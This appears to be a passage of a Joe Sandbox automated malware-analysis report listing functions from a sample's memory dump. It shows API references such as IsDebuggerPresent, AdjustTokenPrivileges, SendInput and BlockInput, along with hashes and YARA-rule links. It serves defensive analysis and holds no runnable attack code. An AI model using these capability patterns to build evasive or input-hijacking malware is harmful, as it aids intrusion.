Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 48b14b2c000a4672e067e53ebd8d759cd131e3684290a438b00951f664956660
Instruction ID: 105ee55e0de752400932f6f22df6ee6f13aac752844acd5d05f1f56ad03253dc
Opcode Fuzzy Hash: 48b14b2c000a4672e067e53ebd8d759cd131e3684290a438b00951f664956660
Instruction Fuzzy Hash: 08323775A007059FC728CF59C481A6ABBF1FF48710B15C5AEE49ADB3A1EB70EA41CB44

Function 00B15C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00B15CC1
FindNextFileW.KERNEL32(00000000,?), ref: 00B15D17
FindClose.KERNEL32(?), ref: 00B15D5F

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 4fb2ac95d6c55d2bcde127d80e19f790e9b8093a533980d9b373f87f4185a735
Instruction ID: 13e6c1796433518b073a9bc834e626e499c7a9e9436bca8fb1b42576154eb187
Opcode Fuzzy Hash: 4fb2ac95d6c55d2bcde127d80e19f790e9b8093a533980d9b373f87f4185a735
Instruction Fuzzy Hash: 37517A74604601DFC724DF28D494E9ABBE4FF4A324F5485ADE95A8B3A1CB30ED84CB91

Function 00AD2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00AD271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00AD2724
UnhandledExceptionFilter.KERNEL32(?), ref: 00AD2731

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 96a24f996bc7f5468e8ae30a63e771211c22b323391fd67f8ba817c91b44da45
Instruction ID: 4894874997a0fdd0a11726a14ca612397caa6a68e3b83767bf1f5c21255744d4
Opcode Fuzzy Hash: 96a24f996bc7f5468e8ae30a63e771211c22b323391fd67f8ba817c91b44da45
Instruction Fuzzy Hash: CF31D67590121CABCB21DF64DD88BDDBBB8AF18310F5041EAE81CA7260EB349F818F44

Function 00B151CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B151DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00B15238
SetErrorMode.KERNEL32(00000000), ref: 00B152A1

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 2fe8545d820e712b39501263115ef9524de6010a4867824a9cc0f6c0487571a9
Instruction ID: 8e40239f9f605685a6cf532627f538aaddedec97fba263a988bcf6a65f0b83da
Opcode Fuzzy Hash: 2fe8545d820e712b39501263115ef9524de6010a4867824a9cc0f6c0487571a9
Instruction Fuzzy Hash: 0F315E75A00618DFDB00DF94D884EAEBBF4FF49314F548099E805AB3A2DB31E855CB90

Function 00B016C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00ABFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00AC0668
Part of subcall function 00ABFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00AC0685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B0170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B0173A
GetLastError.KERNEL32 ref: 00B0174A

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 6936b6458da53d88c1ca8bd769a5230f0d8c5d4c8feb1910c3aa5c3c12681a4d
Instruction ID: 530f086f7edc64d87d0b71c22aef63f31e40f14405a6cd79c5b2f4a12ebc183e
Opcode Fuzzy Hash: 6936b6458da53d88c1ca8bd769a5230f0d8c5d4c8feb1910c3aa5c3c12681a4d
Instruction Fuzzy Hash: 07119EB2504304AFD718AF58DDC6DAABBFDEB44714B24856EE05657281EB70FC418B24

Function 00B0D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B0D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00B0D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B0D650

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: b81a306616d80905d28b9de3971580c0745d76dedb1c49eff5e0c034c1823eab
Instruction ID: 2be3cf4d533abf26f3d1ceffd202dd0c8270e3822ea231d0506079c3c56fabb8
Opcode Fuzzy Hash: b81a306616d80905d28b9de3971580c0745d76dedb1c49eff5e0c034c1823eab
Instruction Fuzzy Hash: 64113C75E05228BFDB108F959C45FAFBFBCEB45B50F108155F904F7290D6704A058BA1

Function 00B01663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00B0168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00B016A1
FreeSid.ADVAPI32(?), ref: 00B016B1

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: d6584c164b1cbed5792b9aabc556469955ff9567b3809941f901b7667cd82db1
Instruction ID: 1cf6db109a0d0aea3987522bbaa298f0969b03f98ba20ced62f9295ee7eda7a4
Opcode Fuzzy Hash: d6584c164b1cbed5792b9aabc556469955ff9567b3809941f901b7667cd82db1
Instruction Fuzzy Hash: 6EF0F47195030DFBDB00DFE49D89AAEBBBCEB08704F5049A5E501E2181E774AA448B50

Function 00AC4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00AD28E9,?,00AC4CBE,00AD28E9,00B688B8,0000000C,00AC4E15,00AD28E9,00000002,00000000,?,00AD28E9), ref: 00AC4D09
TerminateProcess.KERNEL32(00000000,?,00AC4CBE,00AD28E9,00B688B8,0000000C,00AC4E15,00AD28E9,00000002,00000000,?,00AD28E9), ref: 00AC4D10
ExitProcess.KERNEL32 ref: 00AC4D22

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 1642c343c5e8f1c386ce92e5d0afebaa863319d028bd379b00f53d273f543884
Instruction ID: e9850dca7bf09943b4543370d02be70df7c3c45f1fe902fd89bcf49c075c4bc7
Opcode Fuzzy Hash: 1642c343c5e8f1c386ce92e5d0afebaa863319d028bd379b00f53d273f543884
Instruction Fuzzy Hash: 2AE0B631000548AFCF12BFA4DE1AF993F69EB45791B214418FC06AB222CB35DD52DB88

Function 00ADC2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 00ADC36C

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: fa9223fec98cd234201c5cc3f6566e086de183c366bc2a8dc9953efcc7f5f419
Instruction ID: 24cb22d9d516a7e509840e93b267567fd68bd9b4fe753b57903714ff06eaf152
Opcode Fuzzy Hash: fa9223fec98cd234201c5cc3f6566e086de183c366bc2a8dc9953efcc7f5f419
Instruction Fuzzy Hash: 76413B7650021A6FCB24AFB9CC4DEFBB778EB84724F50426AF916DB280E6709D41CB50

Function 00AFD27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00AFD28C

Strings

X64, xrefs: 00AFD2A8

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: f7e6d15a7ca0b64520f722759b43a7fcdd4027e2f2f76f2de29dabd7675f71c9
Instruction ID: f70148f062015951dd541a957f27c0c569963e3cb3a471bf0a3736578b515e6b
Opcode Fuzzy Hash: f7e6d15a7ca0b64520f722759b43a7fcdd4027e2f2f76f2de29dabd7675f71c9
Instruction Fuzzy Hash: F2D0C9B480111DEACB94DB90DC88DDDB77CBB04305F200151F106A2000DB3096488F10

Function 00ACCAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: 97fbe2640c45908b6c2dcf7f344587accccfcbd519f866ca847d1e2fba3bab17
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: 4C020C71E002199BDF14CFA9C980BADBBF1EF48324F25816ED919E7384D731AE418B94

Function 00B168EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00B16918
FindClose.KERNEL32(00000000), ref: 00B16961

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 6d68a6c8d03c2ec97a15aeeaa2b0b54ef3b482a80791057d90b6fd75db832077
Instruction ID: f2c2579ec45dfaff0bc35ec3f531afc25947cb3f1970c0b0e302182c418a5723
Opcode Fuzzy Hash: 6d68a6c8d03c2ec97a15aeeaa2b0b54ef3b482a80791057d90b6fd75db832077
Instruction Fuzzy Hash: 841193316042119FD710DF69D884A1ABBE5FF89328F54C699E4698F2A2CB30EC45CB91

Function 00B137B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00B24891,?,?,00000035,?), ref: 00B137E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00B24891,?,?,00000035,?), ref: 00B137F4

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 1afc5ba809fdc3885cac9b186a7a272b236f43114ebf8954f184c87d7563e351
Instruction ID: d689ae150393fbea821ae4ac040ab034115c86138ecdf7a565bb2a31b84be960
Opcode Fuzzy Hash: 1afc5ba809fdc3885cac9b186a7a272b236f43114ebf8954f184c87d7563e351
Instruction Fuzzy Hash: 04F0A0B16042282AE72027A68D49FEB3AAEEF85B61F000175B509E32C1DA609D4487B1

Function 00B0B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00B0B25D
keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00B0B270

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: e896179e57b67fd87225983cc2632e5b28ded55df5ed3c5db04bcc94c1885c29
Instruction ID: fcb10bcb7c60e240f6ab8c3e2d108fe24756976ca04397e1a57447000f59bf53
Opcode Fuzzy Hash: e896179e57b67fd87225983cc2632e5b28ded55df5ed3c5db04bcc94c1885c29
Instruction Fuzzy Hash: 03F0177180428EABDB059FA0C806BAE7FB4FF08309F10804AF965A61A2C77986119F94

Function 00B010BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B011FC), ref: 00B010D4
CloseHandle.KERNEL32(?,?,00B011FC), ref: 00B010E9

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 6a6b1c0e6767ff5e2f83bbd9d6417896342576ad5c33aea966faf3b2a6f8f2de
Instruction ID: 3b90e3b907561630e951299e25bda765a834127c15f53cc79ab7a473dc7b46e1
Opcode Fuzzy Hash: 6a6b1c0e6767ff5e2f83bbd9d6417896342576ad5c33aea966faf3b2a6f8f2de
Instruction Fuzzy Hash: 42E0BF72014610AEE7252B55FD05EB77BEDEB04310B24882DF5A6914B1DB62ACA0DB54

Function 00AACAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 00AF0C40

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.
API String ID: 0-1840281001
Opcode ID: ed372c90487b2d2cfa294f42a6a870c8cc57d9328ef547fc4e828443fa758162
Instruction ID: f38e47a72dbde2f2bf285030c87c474d4a73c0b1765a355ae8785c4dc8e50769
Opcode Fuzzy Hash: ed372c90487b2d2cfa294f42a6a870c8cc57d9328ef547fc4e828443fa758162
Instruction Fuzzy Hash: EE327A70900218DFEF14DF94C985EFDB7B5BF06324F148069E906AB292DB75AE46CB60

Function 00AD676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00AD6766,?,?,00000008,?,?,00ADFEFE,00000000), ref: 00AD6998

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: b0bd1e54d2e403f2a6a8669942e1ac91b47d9fa12aead09639baf1b389947677
Instruction ID: 0aed528b5213d842346f212ceba7c245a8b4df843c77308b55a39fa384f21c82
Opcode Fuzzy Hash: b0bd1e54d2e403f2a6a8669942e1ac91b47d9fa12aead09639baf1b389947677
Instruction Fuzzy Hash: 17B129316106099FD715CF28C48AB697BB0FF45364F29865AE8DACF3A2C735E991CB40

Function 00ABB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 00AF851F

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: c3bf79ff41f3b4ca8ef7ec5f09283dfc4a10a0523a3a396755799034ac8a855f
Instruction ID: d8e2d599b95d74817103b0048616e3944647852b8aadf08cbf42194dd773e1a4
Opcode Fuzzy Hash: c3bf79ff41f3b4ca8ef7ec5f09283dfc4a10a0523a3a396755799034ac8a855f
Instruction Fuzzy Hash: 561251759102299FCB14CF98C8806FEB7F5FF48710F14819AE949EB256DB749E81CBA0

Function 00B1EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00B1EABD

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 2ae5324069f7a68d6bfc54776e0a58100bd9d05cec60c12a809bf2c7d570e214
Instruction ID: c9f304aecbc53b01249350fb6f01c32488d1837486d07ea01fbe0cd6926616d9
Opcode Fuzzy Hash: 2ae5324069f7a68d6bfc54776e0a58100bd9d05cec60c12a809bf2c7d570e214
Instruction Fuzzy Hash: 0EE04F322102049FD710EF69D945E9AFBE9EF99770F008456FC4AD7391DB70E8808BA1

Function 00AC09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00AC03EE), ref: 00AC09DA

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
